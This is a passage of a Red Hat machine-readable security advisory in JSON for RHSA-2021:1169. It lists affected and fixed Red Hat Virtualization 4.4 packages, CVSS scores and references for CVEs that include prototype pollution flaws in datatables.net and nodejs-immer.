"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-25657"
},
{
"category": "external",
"summary": "RHBZ#1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-25657",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25657"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657"
}
],
"release_date": "2020-11-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "m2crypto: bleichenbacher timing attacks in the RSA decryption API"
},
{
"cve": "CVE-2020-28458",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-12-16T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1908441"
}
],
"notes": [
{
"category": "description",
"text": "All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift console container does package a vulnerable version of datatables.net, however as access to the vulnerable component is restricted via OpenShift OAuth the vulnerability is rated with an impact of `Low`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28458"
},
{
"category": "external",
"summary": "RHBZ#1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28458",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28458"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402",
"url": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402"
}
],
"release_date": "2020-10-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name"
},
{
"cve": "CVE-2020-28477",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2021-01-20T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1918162"
}
],
"notes": [
{
"category": "description",
"text": "This affects all versions of package immer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-immer: prototype pollution may lead to DoS or remote code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Virtualization includes affected version of nodejs-immer, however the usage does not meet the conditions required to exploit the flaw, therefore the impact is Low.\n\nIn OpenShift Container Platform 4.6 (OCP) the openshift4/ose-prometheus container ships the vulnerable version of the nodejs-immer, however the Prometheus react-ui is disabled, hence this flaw cannot be exploited. As openshift4/ose-prometheus container still packages the vulnerable code, this component is affected with impact Low. This may be fixed in a future release.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
